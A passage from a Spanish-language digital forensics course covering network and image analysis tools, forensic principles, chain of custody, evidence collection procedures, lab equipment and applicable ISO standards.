(Terminal Access Point), que son dispositivos que reciben una copia del tráfico original
para ser analizado.

Ilustración 37. Network TAP
El análisis forense de red se utiliza principalmente en la gestión de incidentes con malware,

pero también es un método de detección y resolución de errores de los sistemas y
aplicaciones que se conectan a la red.
Ilustración 38. Análisis forense de red
2.25. Wireshark
Wireshark es un analizador de protocolos de red que permite analizar los paquetes
capturados en un tramo de la red.
Es una herramienta muy potente disponible para sistemas Windows, Linux y Mac.
Tiene una capacidad analítica muy alta y reglas de filtrado para realizar búsquedas

sobre cualquier campo de un paquete de red como, por ejemplo, la IP, puerto o protocolo.
Activando el modo promiscuo de una interfaz de red, captura los paquetes que se
transmiten en ese segmento de la red.
Ilustración 39. Wireshark
NETWORKMINER
NetworkMiner es otro sniffer de paquetes de red disponible para Windows. Esta
herramienta tiene la capacidad de filtrar y mostrar información valiosa enviada en los
paquetes de la red.
De una forma sencilla, analiza el tráfico capturado y es capaz de mostrar las imágenes
transmitidas, mensajes de chats y emails, credenciales, palabras clave, consultas DNS,
etc.
Sin duda, es una de las herramientas que debemos tener a nuestro alcance.
2.26. Análisis de imágenes

El análisis forense en imágenes digitales es otra área muy estudiada en forensia que
tiene como objetivo determinar el origen y autenticidad de una fotografía, para poder
establecer una relación entre un individuo con un dispositivo, lugar o evento.
La proliferación de dispositivos de captura digital y edición de imágenes ha provocado
que cada vez existan técnicas más sofisticadas para la manipulación de estas imágenes
digitales.
Por ello, el análisis forense en imágenes digitales debe tener en cuenta los siguientes
aspectos para considerar una imagen como un indicio o evidencia:

• Origen de la imagen: ¿Quién?, ¿cuándo?, ¿dónde? y ¿por qué?
• Dispositivo con el cual se capturó la imagen: Podría ser una cámara digital,
un smartphone, tablet, etc.
• Características de la imagen: Propiedades como la calidad de la imagen, la
resolución, tamaño, formato, etc.
• Integridad de la imagen: Detección de imágenes manipuladas o editadas.
• Información oculta en imágenes: La esteganografía consiste en el estudio
y aplicación de técnicas que permiten ocultar mensajes en los datos de
una fotografía utilizando un canal encubierto que puede ser empleado para
exfiltrar información o transmitir mensajes ocultos.
Para poder obtener información sobre una imagen digital, podemos hacer uso de
herramientas como las siguientes:
• Foca: Es una herramienta open source especializada en la extracción, análisis

y edición de metadatos de cualquier tipo de fichero.
• ExifTool: Es otra herramienta capaz de leer y manipular los metadatos de
ficheros, imágenes, documentos, etc. Es muy simple y rápida, además de
portable a cualquier sistema.
• Forensically: Es una herramienta online para el análisis de imágenes. Está
compuesta por varias herramientas que permiten realizar un análisis eficaz y
rápido de una imagen digital.
Ilustración 40. Foca
3.El Laboratorio Pericial

3.1. Principios multidisciplinares del análisis forense
La informática forense aplica técnicas científicas y analíticas dirigidas a identificar,

preservar, analizar y presentar evidencia con objeto de un proceso legal.
Esto se realiza mediante un informe técnico pericia. La primera problemática que vamos

a encontrar en ello es en cómo implementar evidencias no tangibles en un soporte
documental físico.
La segunda problemática es que además debemos realizarlo bajo unos principios
multidisciplinares del ámbito jurídico ambiguos, pero a la vez inflexibles.
Los principios de obligado cumplimiento para un profesional son:
• Objetividad
• Autenticidad y conservación
• Legalidad
• Idoneidad
• Inalterabilidad
• Documentación
• Repetibilidad de la prueba
Adicionalmente, debemos de conocer otros principios relacionados más a la práctica

pericial, algunos no siempre aplicables:
• Protección y preservación
• Identidad de copias
• Tecnológico interdisciplinario
• Oportunidad
• Compatibilización
Ilustración 41. Imagen representativa análisis forense. Fuente: comput-electronic
PRINCIPIO DE OBJETIVIDAD
El forense informático debe ser objetivo y además si su informe tiene como destino el
ámbito judicial, adicionalmente tiene la obligación de ser imparcial, con independencia
absoluta del requirente y si incluso es el mismo que abona sus honorarios con más motivo.
El no cumplimento de ese principio puede ocasionar nulidad de procedimientos judiciales
y la responsabilidad directa del perito/forense tanto penal y/o civil.

PRINCIPIO DE AUTENTICIDAD Y CONSERVACIÓN
Durante todo el proceso, se debe garantizar que la evidencia física y la digital se proteja
y conserve. Se debe velar por conservar la autenticidad e integridad de los medios de
prueba. Para ello, usaremos instrumentos y software de uso explícitamente forense. En
esta unidad, más adelante, profundizaremos sobre ello.
PRINCIPIO DE LEGALIDAD
Del carácter multidisciplinar de esta disciplina, se obliga a que el perito/forense conozca
la legislación vigente de sus actividades periciales y cumplir con los requisitos reflejados
en ella.
Debe ser preciso en sus matices, opiniones y resultados siempre de manera técnica pero
comprensible. No hacer bajo ningún concepto juicios de valor ni establecer hipótesis y
mucho menos dictaminar culpabilidades o responsabilidades.
Adicionalmente tiene que trabajar siempre con evidencia obtenida de manera legal y
autorizada.
Es importante que el acceso a la información sea explícitamente autorizado e incorporada
dicha autorización al informe directamente o por anexos.
PRINCIPIO DE IDONEIDAD
La evidencia debe ser auténtica, tener relevancia para el caso y reunir un número suficiente
de muestras. Si no se reúnen estos requisitos convendría no aceptar el encargo o solicitar
que se subsanen, por lo que antes de iniciar un procedimiento de análisis o cualquier otro
debe comprobarse que se reúnen los requisitos que conforman este principio.
El objeto pericial es el encargo concreto y detallado que nos hace la parte solicitante
sobre el alcance de nuestra investigación o pericial.
De forma básica este principio establece que la evidencia aportada por el juzgado o las
partes es útil e idónea para el objeto pericial solicitado.
Muchas veces, nos encontramos en el entorno judicial peticiones de informes con objetos
periciales poco detallados o genéricos y evidencia y/o parte documental escasa.
PRINCIPIO DE INALTERABILIDAD
Se debe realizar todo el proceso asegurando que la evidencia no ha sido manipulada
durante la pericia. La evidencia se preserva mediante la debida cadena de custodia, si
esta se realiza correctamente nos indicara en que punto de la misma ha sido manipulada
y se podrá identificar al responsable.
La forma más fácil de detectar una manipulación en la evidencia digital es el cálculo del
HASH en la recogida y su cálculo en la entrega. Si ambos valores HASH difieren la gestión
sobre la evidencia digital ha sido errónea, mal trabajada, y además invalida el proceso.
Por ello trabajaremos la inspección y análisis sobre clones íntegros de la evidencia nunca
sobre su original.

PRINCIPIO DE REPETIBILIDAD DE LA PRUEBA
En cualquier informe pericial de carácter tecnológico, se debe de aportar al mismo toda
la información, evidencia digital, identificación de software empleado, etc. para que
cualquiera de las partes intervinientes, puedan realizar, a efectos de comprobación y
reproducción de la prueba, todo el proceso y obviamente llegar a los mismos resultados.
Obviamente, si la parte contraria aporta un informe que no garantiza la posibilidad de
repetir el ensayo o análisis objeto de estudio, estamos en el mismo derecho de poder
solicitar la impugnación de esta.
PRINCIPIO DE IDENTIDAD DE COPIAS

Existen infinidad de procesos de almacenamiento de información como imágenes,
backups, etc. Pero de forma inequívoca, debemos trabajar siempre sobre copias bit a bit
integras. Clones idénticos, a ser posible generados con hardware totalmente autónomo
de clonación. En los que no exista nivel de compresión alguno y realicen un clonado
idéntico y siempre verificable mediante algoritmos HASH.
Existen en el mercado un gran número de clonadoras de uso forense siendo las
recomendadas para este procedimiento. Evítese, en la medida de lo posible, usar software
de clonado en el que jamás se conseguirá que el algoritmo HASH coincida.
3.2. Cadena de custodia de la evidencia física y digital

La cadena de custodia la podemos definir como el conjunto de actos técnicos y jurídicos
realizados por personal especializado (forense, perito, agente policial) para garantizar
la autenticidad, la inalterabilidad y la indemnidad, esto es relativamente fácil cuando
el elemento a custodiar es físico y fácilmente identificable. Ya sea mediante precintos,
embalajes y un formulario documental esta evidencia es fácilmente trazable y se puede
identificar en qué momento de la custodia ha sido modificada, alterada, etc.
El problema empieza con la evidencia tecnológica, que puede ser física y/o digital.
Pongamos por ejemplo que un agente policial interviene un disco duro. En este caso la
cadena de custodia debe ser doble por un lado física del soporte de almacenamiento y
por otro digital por los datos que contiene el soporte. O solo digital en el caso de un correo
electrónico.
En el caso del disco duro deberá realizarse una doble cadena de custodia, la física y
la digital, y en el caso del email deberá realizarse de manera digital ya sea contenida
posteriormente de manera física o mediante certificación de tercero de confianza.
Conceptos que más adelante estudiaremos.
La mejor manera de gestionar la evidencia digital, a efectos de cadena de custodia,
es mediante el uso de algoritmos HASH. En cualquier caso, si se decide optar por otros
métodos estos deben disponer de una certificación inequívoca y comprobable.

En el ámbito forense, la gestión de la cadena de custodia digital es efectiva y relativamente
fácil si se cumplen con los siguientes requisitos:
• Realizar copias BIT a BIT.
• Gestionar adecuadamente los cálculos HASH.
• Trabajar siempre sobre la copia.
• Deposito Notarial del original o en ausencia de contenerlos en un elemento
físico certificación mediante terceros de confianza de su existencia.
En resumen, la cadena de custodia es un protocolo creado para asegurar la integridad y
veracidad de las evidencias, cumpliendo para ello todos los requisitos legales exigidos. La
violación o incumplimiento de la cadena de custodia de una evidencia, automáticamente
invalida la evidencia, independientemente del valor que esta tenga. En la ilustración 87 se
pueden observar las distintas fases de la cadena de custodia.
Ilustración 42. Diagrama Cadena de custodia.
3.3. La cadena de custodia de la evidencia digital

La Red Europea de Institutos de Ciencias Forenses (ENFSI) en el Manual de Buenas
Prácticas, expone los principios y prácticas que deben llevarse a cabo en el
procedimiento forense digital:

• Principios aplicables a la recopilación de evidencias:
o Las reglas generales de las evidencias deben ser aplicadas a todas las
evidencias digitales.
o Tras la recogida de evidencias, las acciones llevadas a cabo no deben
alterar estas evidencias.
o Cuando sea necesario acceder a la evidencia original, el personal que
acceda a esta debe disponer de la formación adecuada para tal fin.
o Todas las actividades relacionadas con la recogida, acceso,
almacenamiento o trasmisión de evidencias digitales, debe estar
completamente documentadas y disponibles para su posterior revisión.
o Un individuo en particular es responsable de todas las acciones
llevadas a cabo en relación con las evidencias digitales mientras estén
bajo su posesión.
• Prácticas aplicables a la recopilación de evidencias:
o Detalles de la recopilación: Tiene que estar completamente
documentada en todas las etapas que se lleven a cabo.
o Almacenamiento: Cualquier evidencia ha de estar perfectamente
etiquetada y con las medidas de seguridad idóneas, manteniendo por
tanto las baterías cargadas y la conexión de los dispositivos volátiles a
la red eléctrica.
o Análisis: Estrategias bien definidas para documentar el análisis de
evidencias.
Podemos incluir a nivel de evidencia digital, que ésta comienza con el registro de lo
practicado y obtenido en las fases de Preservación y Adquisición, correctamente
identificado digitalmente gracias al cálculo de su función resumen o hash.
Ilustración 43. Contenedores de evidencia digital. Fuente: Alonso Caballero / ReYDeS

La prueba que nos conduce a hablar de un presunto delito debe ser tratada con las
máximas garantías por el tribunal, sin que exista duda de su manipulación técnica. El
procedimiento empleado para la custodia de las pruebas no debe arrojar sospechas de
su alteración digital.
Es por ello, que la prueba real, debe ser custodiada en el juzgado, ante notario o bien, a
través de cualquier sistema de precintado o recurso que aísle tras la demanda y retirada
de la misma, e impida su posterior manipulación por terceros con la idea de ocultar o
variar los hechos tal como sucedieron.
La cadena de custodia se realiza mediante copia y depósito de la información ante
notario. Si no hay requerimiento judicial será realizado por el secretario judicial.
El perito informático, realizará una clonación: disco duro, grabación, etc, sobre la que se
va a trabajar, que será una imagen exacta del contenido de la prueba original (copia bit
a bit), dejando a salvo la prueba original, para que con el análisis no pueda sufrir cambios
o desvirtuar la prueba, lo que sería rechazado por el tribunal o la parte contraria.
Como complemento a dicha cadena de custodia, una vez finaliza la copia exacta
del disco duro en cuestión, el perito informático, si es posible ante notario, procede a
calcular el HASH criptográfico. El objetivo del cálculo del HASH es permitir comprobar, sin
usar ningún mecanismo adicional, la autenticidad del origen de los datos asegurando
además la integridad de dichos datos. Una vez establecida la cadena de custodia, el
perito informático comienza el Análisis Forense.
La cadena de custodia informático-forense tiene por objeto asegurar que la prueba
ofrecida cumple con los requisitos exigibles procesalmente para la misma, y por ello
debe garantizar:
1. Trazabilidad:
• Humana (determinación de responsabilidades en la

manipulación de la prueba, desde su detección y recolección
hasta su disposición final).
• Física (incluyendo la totalidad de los equipos locales
o remotos involucrados en la tarea, sean estos de
almacenamiento, procesamiento o comunicaciones).
• Lógica (descripción y modelización de las estructuras de
distribución de la información accedida y resguardada).
Confiabilidad (integridad, autenticidad, confidencialidad, no repudio).

3.4. Modelo de documento: Cadena de custodia de la
evidencia digital
Ilustración 44. Hoja nº1 documento Modelo Cadena de Custodia
Ilustración 45. Hoja nº2. Documento Modelo Cadena de Custodia

Ilustración 46. Hojas nº 3 y nº4 Documento Modelo Cadena de Custodia
3.5. Fotografía forense

Se puede definir a la fotografía forense como la disciplina que tiene por objeto la
documentación gráfica de las condiciones en las que se encuentra el lugar de los hechos
o de todos los indicios localizados en él. Nos resulta muy útil también para realizar la
cadena de custodia física ya que el reportaje fotográfico del estado de la evidencia es
imprescindible.
Sus objetivos principales son:
• Coadyuvar a la correcta conservación de la evidencia.
• Complementar las descripciones escritas.
• Constituir un elemento de prueba para el juicio.
• Reconstruir la escena del crimen todas las veces que sea necesario.
La fotografía forense constituye un punto de apoyo relevante para la descripción escrita.

Es el medio gráfico más importante con el que se cuenta para fijar con precisión y
exactitud el lugar de los hechos.

En toda investigación criminal deberá obtenerse todas las fotografías necesarias que
puedan resultar útiles para describir el escenario del suceso, de tal manera aquellas
personas que no estuvieron presentes sean capaces de apreciar con detalle toda la
información de la escena y sus indicios, y estar en condiciones de realizar sus apreciaciones
sobre las características del caso. Se recomienda la utilización de un apoyo fílmico que
acompañe a estas fotografías.
Ilustración 47. Fotografía forense. Fuente: https://images.app.goo.gl/bEBXBS7STeFFfdva6
En una investigación forense se debe identificarse la totalidad de los elementos informáticos

dubitados (computadoras, red de computadoras, netbook, notebook, celular, iPad, GPS,
etc.) y para ello realizar un inventario de hardware en la inspección y el reconocimiento
judicial que quedarán consignados en el formulario registro de evidencia. Por ello se debe
fotografiar todos los detalles posibles:
• Fotografiar el lugar del hecho o filmar todos los elementos que se encuentran
en el área de inspección, desde la periferia hacia el área dubitada.
• Fotografiar los elementos informáticos, determinando en cuál de ellos efectuar
macrofotografía:
o Pantallas del monitor del equipo dubitado.

o Vistas frontal, lateral y posterior, según corresponda.
o Números de series de los elementos informáticos, etiquetas de
garantías.
o Periféricos, (teclados, mouse, monitor, impresoras, agendas
PDA, videocámaras, video grabadora, PenDrive, dispositivos de
almacenamiento en red, unidades de Zip o Jazz, celulares, iPod, etc.).
o Material impreso en la bandeja de la impresora o circundante.
o Cableado.
o Dispositivos de conectividad, alámbricos e inalámbricos.
o Diagramas de la red y topologías.

3.6. Recolección y registro de evidencia digital
Ilustración 48. Recolección de evidencia digital según el equipo se encuentre encendido o apagado.
CON EL EQUIPO ENCENDIDO
En el caso de que se deba acceder a un equipo encendido, se debe considerar la

obtención de los datos en tiempo real y de los dispositivos de almacenamiento volátil.
Los dispositivos de almacenamiento volátil de datos pierden la información luego de
interrumpirse la alimentación eléctrica, es decir, al apagar la computadora la información
almacenada se pierde.
Los datos que se encuentran en el almacenamiento volátil muestran la actividad actual
del sistema operativo y de las aplicaciones, como por ejemplo: procesos en el estado
de ejecución, en el estado de listo o bloqueado, actividad de la impresora (estado, cola
de impresión), conexiones de red activas, puertos abiertos, (puerto es una estructura a
la que los procesos pueden enviar mensajes o de la que pueden extraer mensajes, para
comunicarse entre sí, siempre está asociado a un proceso o aplicación, por consiguiente
sólo puede recibir de un puerto un proceso, recursos compartidos, estado de los
dispositivos como discos rígidos, disqueteras, cintas, unidades ópticas).
Los datos volátiles están presentes en los registros de la unidad central de procesamiento
del microprocesador, en la memoria caché, en la memoria RAM o en la memoria virtual.
El conjunto de tareas a realizar en el acceso a los dispositivos de almacenamiento volátiles
es:
1. Ejecutar un intérprete de comandos confiable o verificado matemáticamente.

2. Registrar la fecha, hora del sistema, zona horaria.
3. Determinar quién o quiénes se encuentran con una sesión abierta, ya sea usuarios
locales o remotos.
4. Registrar los tiempos de creación, modificación y acceso de todos los archivos.

5. Verificar y registrar todos los puertos de comunicación abiertos.
6. Registrar las aplicaciones relacionadas con los puertos abiertos.
7. Registrar todos los procesos activos.
8. Verificar y registrar las conexiones de redes actuales y recientes.
9. Registrar la fecha y hora del sistema
10. Verificar la integridad de los datos.
11. Documentar todas las tareas y comandos efectuados durante la recolección.
Posteriormente, en lo posible, se debe realizar una recolección más detallada de los datos
existentes en el almacenamiento volátil, efectuando las siguientes tareas:
1. Examinar y extraer los registros de eventos.
2. Examinar la base de datos o los módulos del núcleo del sistema operativo.
3. Verificar la legitimidad de los comandos del sistema operativo.
4. Examinar y extraer los archivos de claves del sistema operativo.
5. Obtener y examinar los archivos de configuración relevantes del sistema operativo.
6. Obtener y examinar la información contenida en la memoria RAM del sistema.
El procedimiento será con el equipo encendido, acceder al recurso acorde al orden de

volatilidad de la información, con las herramientas forenses almacenadas en disquete o
cd-rom y de acceso de solo lectura:
1. Ejecutar un intérprete de comandos legítimo.
2. Obtener y transferir el listado de comandos utilizados en la computadora, antes
de la recolección de datos.
3. Registrar fecha y hora del sistema.
4. Recolectar, transferir a la estación forense o medio de recolección forense y
documentar.
a. Fecha y hora del sistema.
b. Memoria principal.
c. Usuarios conectados al sistema.
d. Registro de modificación, creación y tiempos de acceso de todos los
archivos.
e. Listado de puertos abiertos y de aplicaciones escuchando en dichos puertos.
f. Listado de las aplicaciones asociadas con los puertos abiertos.
g. Tabla de procesos activos.
h. Conexiones de red actuales o recientes.
i. Recursos compartidos.
j. Tablas de ruteo.
k. Tabla de ARP.
l. Registros de eventos de seguridad, del sistema, de las aplicaciones, servicios
activos.
m. Configuración de las políticas de auditoría del sistema operativo.
n. Estadísticas del núcleo del sistema operativo.
o. Archivos de usuarios y contraseñas del sistema operativo.
p. Archivos de configuración relevantes del sistema operativo.
q. Archivos temporales.
r. Enlaces rotos.
s. Archivos de correo electrónico.
t. Archivos de navegación en internet.
u. Certificación matemática de la integridad de los datos.

v. Listado de los comandos utilizados en la computadora, durante la recolección
de datos.
w. Recolectar la topología de la red.
Después de este proceso, si es factible apagar el equipo.
CON EL EQUIPO APAGADO

En cualquier caso, solo deberá utilizar dispositivos de arranque en el modo solo lectura,
con herramientas informáticas forenses para realizar la detección, recolección y registro
de indicios probatorios.
El procedimiento será el siguiente:
1. Apagar el equipo desconectando el cable de alimentación eléctrica

2. Retirar disquetes, PenDrive o elementos extraíbles con especial interés en redes
lan y wifi.
3. Descargar la propia electricidad estática, tocando alguna parte metálica y
abrir la caja.
4. Desconectar la interfaz o manguera de datos, puede ser IDE o SCSI.
5. Desconectar la alimentación eléctrica del dispositivo de disco rígido.
6. Ingresar al CMOS (complementary metal oxide semiconductor) o configuración
del BIOS (sistema de entrada y salida de la computadora):
a. Encender la computadora
b. Oprimir el conjunto de teclas que se muestra en el monitor cuando se inicia
la computadora para acceder al CMOS.
c. Verificar la fecha y hora del CMOS y registrarla en el formulario de recolección
de evidencia. y documentar todo tipo de dato que el perito informático
forense considere relevante y documentarlo con fotografía, filmadora o en
la lista de control.
d. Modificar la unidad de inicio o arranque del sistema operativo, es decir
seleccionar la unidad de disquete, CDROM/DVD o ZIP de solo lectura con las
herramientas informáticas forenses.
e. Guardar los cambios al salir.
7. Colocar la unidad de arranque, disquete, cdrom/dvd o zip en el dispositivo de
hardware pertinente.
8. Verificar el inicio desde la unidad seleccionada.
9. Apagar el equipo.
10. Acorde a la decisión del perito informático forense o a lo solicitado en la
requisitoria pericial, se podrá realizar el Procedimiento de duplicación y
autenticación de la prueba, explicado anteriormente o continuar con la lectura
del dispositivo original, configurando el mismo con los jumpers que el fabricante
indique como solo lectura o colocando un dispositivo de hardware de bloqueo
de escritura.
11. Conectar el cable plano al disco rígido, puede ser IDE o SCSI.
12. Conectar la alimentación eléctrica del dispositivo de disco rígido.
13. Encender la computadora iniciando desde la unidad de arranque configurada
en el CMOS.

14. Colocar el dispositivo de almacenamiento forense.
15. Efectuar la certificación matemática del dispositivo dubitado.
16. Guardar el resultado en un dispositivo de almacenamiento forense.
17. Registrar el resultado en el formulario de recolección de la evidencia.
18. Por medio del conjunto de herramientas informático forense, obtener la siguiente
información del disco dubitado, documentarla y almacenarla en dispositivos
de almacenamiento forense, para su posterior análisis, ya sea en el lugar del
hecho o en el laboratorio:
a. Tipo de sistema operativo
b. Fecha, hora y zona horaria del sistema operativo
c. Versión del sistema operativo
d. Número de particiones
e. Tipo de particiones
f. Esquema de la tabla de particiones
g. Listado de todos los nombres de archivos, fecha y hora
h. Registro del espacio descuidado o desperdiciado
I. Incluido el MBR
II. Incluida la tabla de particiones
III. Incluida la partición de inicio del sistema y los archivos de
comandos
i. Registro del espacio no asignado
j. Registro del espacio de intercambio
k. Recuperación de archivos eliminados
l. Búsqueda de archivos ocultos con las palabras claves en el:
I. espacio desperdiciado
II. espacio no asignado
III. espacio de intercambio
IV. MBR y tabla de particiones
m. Listado de todas las aplicaciones existentes en el sistema
n. Búsqueda de programas ejecutables sospechosos
o. Identificación de extensiones de archivos sospechosas.
p. Listado de todos los archivos protegidos con claves.
q. Listado del contenido de los archivos de cada usuario en el directorio raíz y
si existen, en los subdirectorios
r. Verificación del comportamiento del sistema operativo:
I. Integridad de los comandos

II. Integridad de los módulos
III. Captura de pantallas
19. Generar la autenticación matemática de los datos a través del algoritmo de

hash al finalizar la detección, recolección y registro.
20. Conservar las copias del software utilizado
21. Apagar o dejar funcionando el equipo, esto dependerá de la requisitoria pericial.
Procedimiento para el resguardo de la prueba y preparación para su traslado:
1. Disponer, según sea el caso, las pruebas obtenidas en una zona despejada,
para su posterior rotulado y registro.
2. Registrar en el formulario de registro de la evidencia cada uno de los elementos
dubitados, acorde a lo especificado en dicho formulario y agregando cualquier
otra información que considere pertinente el perito informático forense.

3. Proteger:
a. en bolsas antiestáticas los elementos informáticos de almacenamiento
secundario, registrando: Fecha y hora del secuestro, tipo, número de serie
del elemento si se puede obtener, capacidad de almacenamiento, apellido,
nombre y documento de identidad del perito informático forense, firma del
perito informático forense.
b. en bolsas manufacturadas con filamentos de cobre y níquel para prevenir
la interferencia de señales inalámbricas (celulares, GPS, etc).
4. Proteger con plástico o con bolsas estériles cualquier otro elemento que
considere relevante el perito informático forense y rotularlos con los datos
pertinentes al elemento, apellido, nombre y documento de identidad del perito
informático forense, firma del perito informático forense.
5. Elaborar el acta de secuestro acorde al formulario del recibo de efectos.
6. Colocar los elementos identificados y registrados en una caja o recipiente de
traslado que asegure la suficiente rigidez, aislamiento térmico, electromagnético
y protección para evitar daños accidentales en el traslado de los elementos
probatorios.
7. Trasladar, en lo posible, los elementos secuestrados reunidos en un
único recipiente, evitando la confusión, separación o pérdida durante su
almacenamiento posterior.
3.7. Elementos básicos y suplementarios

Los elementos básicos que debe disponer un perito son los siguientes:
• Servidor: Obviamente no vamos a profundizar en capacidades de servidor ni

en distribución de la red. Pero se recomienda que al menos disponga de 200
TB NAS y que parte de estos sean redundantes en servicios encriptados en la
nube.
• Protectores contra escritura “Write Blockers”: Son dispositivos que tienen

como objetivo primordial evitar la modificación y/o alteración de las
evidencias digitales y electrónicas. El proceso de protección se lleva a cabo
mediante el acceso al dispositivo físico durante la fase de adquisición de
éste, a través de la inhabilitación de la escritura de este, permitiendo así
el acceso solamente en modo lectura. Las clonadoras de uso forense ya
lo llevan incorporado en el propio dispositivo. Si se pretende extraer una
imagen mediante software, es imprescindible el uso de bloqueadores o
“Write Blockers” para evitar modificaciones no deseadas. Dado la evolución
tecnológica, es absurdo indicar modelos dado que constantemente van
saliendo al mercado.

Ilustración 49. Modelos Bloqueadores Tableau WriteBlockers. Fuente: complexbiz
Clonadoras: Son dispositivos autónomos, también llamados duplicadores forenses o

“forensic duplicator” que llevan incorporado un software de clonación. Se presentan en
diferentes interfaces de entrada y salida (IDE, SATA, USB…), posibilitando, según el modelo
utilizado, múltiples copias forenses del dispositivo original en paralelo y, en modelos más
actuales y avanzados, de evidencias distintas en paralelo. Su objetivo primordial es la
obtención “in situ” de evidencias, comprobando entre otras cosas la integridad de la
copia forense a través del cálculo de la función resumen de la evidencia original y la
copia obtenida. Podemos citar algunas marcas como Tableau, Logicube Falco o Tacens
en el ámbito económico.
Ilustración 50. Clonadora Tableau. Fuente: sumuri¡
• Sistemas portables: En ellos se ejecuta un software forense, que en la mayoría

de los casos no deja de ser una computadora con una arquitectura “rugerizada”,
que se adecúa al trabajo forense. Entre los muchos modelos, existen algunos
que son totalmente autónomos y que incorporan una batería para no depender
de una conexión constante a la red eléctrica. Dependiendo del presupuesto
disponible y el uso que vayamos a hacer de dicho sistema, será rentable o no
la adquisición de alguno de estos sistemas, ya que su coste es muy elevado.

Ilustración 51. Sistema portátil UFED del Laboratorio Pericial Forense. Cellebrite.
o Para presupuestos más ajustados, podemos usar una computadora portátil

que incorpore en software necesario para la obtención de evidencias
digitales, que debe usarse junto con bloqueadores de escritura o “Write
Blockers” y discos duros externos, para almacenar la evidencia extraída, lo
que nos posibilitará llevar a cabo los primeros pasos del análisis, que no
son otros que la extracción de información de las evidencias del lugar del
incidente.
Ilustración 52. Estación forense portátil FREDDIE. Fuente: internet-solutions
• Estación de trabajo forense: Son sistemas creados para la realización de

tareas inherentes al ámbito forense digital, en ciertos casos desarrollados
ad-hoc llevados a cabo por empresas del sector forense, y en sistemas
habituales de sobremesa con características concretas para esas tareas
específicas y adaptados a los requisitos del análisis forense.

Ilustración 53. Estación Forense FRED SR. Fuente: internet-solutions
o Por tanto, una computadora que esté destinado a las labores de estación
forense debe cumplir una serie de requisitos mínimos y tener en cuenta
ciertas recomendaciones, que se detallan a continuación:
• Procesador: La última generación disponible.

• RAM: Debe ser mínimo de 64 GB, aunque es recomendable 128 GB. Por
ejemplo, la compañía Cellebrite solicita que para usar su analizador de
información de móviles sea un mínimo de 32Gb.
• Almacenamiento interno: Será necesario que la computadora posea una
alta capacidad de almacenamiento a ser posible en SSD, para guardar
tanto las extracciones obtenidas, como la información que se obtiene a
partir de estas, que puede suponer miles y miles de archivos.
• Es especialmente recomendable utilizar unidades independientes para
ello, y así evitar cuellos de botella que se producen cuando la computadora
tiene que estar leyendo y escribiendo en el mismo dispositivo.
• Interfaces: Es recomendable tener un número suficiente de interfaces de
todo tipo: USB 3.0, eSATA, docking station para discos duros, lector DVD/
Blu-Ray, etc.
• Fuente de alimentación: Es un componente en el que no se deben
escatimar gastos, ya que la diferencia de precio entre un modelo básico
y una de alta calidad no es significativa, y supone un componente
indispensable para mantener el buen estado de todo el sistema hardware.
• Se debe optar por una fuente de buena calidad, que esté certificada, con
la suficiente potencia para alimentar al equipo y evitar el desgaste por
estrés y así garantizar una calidad de suministro estable. En lo referente
a la fuente de alimentación, es recomendable también contar con un SAI,
para protegernos frente a posibles caídas o fluctuaciones dañinas de la
red eléctrica.

3.8. Equipo de campo
Computadora portátil:
• Trabajar siempre con la última versión del sistema operativo.

• Software de referencia: Encase o Osforensic.
• Complementarios: Autopsy/The Sleuth Kit.
Disco externo: USB 3.0 mínimo: 4TB

Memoria USB 1: Preparada con YUMI para alojar las siguientes distribuciones forenses:
• Distribuciones Kali Linux y Santoku.
Memoria USB 2:
• Adquisición de copias forenses: FTK Imager, OSFMount.

• Análisis online: Volatility, LiME, Netstat, PsList.
Bloqueador de escritura/adaptador forense: Tableau o el propio de UFED Cellebrite
Otros dispositivos:
• Cámara digital.
• Multilector de tarjetas: SD, miniSD, microSD, ConpactFlahs y SIM.
• Cableado: cable USB, miniUSB, microUSB, USB3.0, USB type C y Lightning.
3.9. Configuración de un PC Analista

Tabla 3. Configuración PC Analista
Componente Descripción
Procesador Intel Core I7- 9 generación
Placa base Gigabyte o Asus
RAM Minimo 64 GB
Disco SO SSD Maximo posible
capacidad
Almacenamiento 2 x WD Blue 4TB SATA3 (8TB)
Fuente de Alimentación Seasonic Focus + 650W 80
Plus Gold Modular
Caja Aluminio con ventilación
forzada
Lector Blu-Ray Siempre primeras marcas

Multilector Tacens Anima ACR3
Docking Sharkoon SATA QuickPort 2.5”
& 3.5”
3.10. Normativas aplicables a la gestión del laboratorio

Los procesos específicos para el manejo de la evidencia digital los podemos encontrar
en la norma ISO/IEC 27037 siendo complementarios a la misma las normas ISO 27041,
27042, 27043 y 27050.
Las normas citadas tienen como objeto asegurar el correcto uso de herramientas y
procedimientos para tener en cuenta para un correcto análisis forense de la evidencia.
Adicionalmente podemos encontrar una excelente colección de guías de buenas
prácticas procedentes del Departamento de Justicia de USA y otros organismos:
• NCJ 199408 sobre procedimientos.

• NCJ 219941 sobre enumera los distintos dispositivos que pueden contener
evidencia digital.
• NIST 7387 sobre análisis de móviles.
• ACPD guía de buenas prácticas para evidencia digital.
• RFC 3227 Métodos de recolección y archivo de evidencia.
• HB171 Guía para el manejo de evidencia (australiana).
• Guía ACPO- Buenas prácticas Asociación de jefes de Policía del Reino Unido.
3.11. Gestión interna de un laboratorio

El sistema de gestión de un laboratorio se define como el conjunto de elementos que
interactúan dentro de éste y que tiene como finalidad la dirección y el control de la
calidad del laboratorio.
Se debe formalizar de una manera en la que registre documentalmente, además del
documento de cadena de custodia, todas las etapas del proceso y realizar un seguimiento
exhaustivo, aparte de llevar un control de las muestras o evidencias, objeto de análisis.
Los objetivos que se busca con la implantación de un sistema de gestión es garantizar
que los resultados sean fiables, dar confianza a los solicitantes o el cliente, optimizar
los métodos internos a través de una autoevaluación, aumentar el funcionamiento del
laboratorio en sus resultados y minimizar los riesgos.
También busca el objetivo de una gestión interna del laboratorio eficaz que conlleva una
reducción de los costes y que el tiempo de respuesta sea más efectiva.
El proceso se llevará a cabo mediante actividades que se conectan desde la entrada de
la evidencia en el laboratorio hasta la salida de esta ya sea hacia el cliente o al órgano

judicial solicitante.
Es necesario llevar registros manuales e informáticos de muestras o evidencias que
entran en el laboratorio, para así garantizan de la cadena de custodia, la trazabilidad y la
calidad de los procedimientos y los resultados.
Se tiene que especificar y registrar toda la documentación en detalle, especialmente de
los procesos a los que se han sometido las muestras o evidencias.
Por lo tanto, podemos establecer el proceso de análisis en los siguientes puntos:
ENTRADA Y REGISTRO DE LAS MUESTRAS OBJETO DE ANÁLISIS

Independientemente si las pruebas se recogieron en la escena de los hechos o el cliente
los trajera de manera personal al laboratorio, será necesario registrarlo en el libro de
registro, indicando la fecha, la hora, el medio de transporte y el estado en el que haya
llegado la muestra objeto de análisis. Además, de abrir un expediente en el que se incluirá
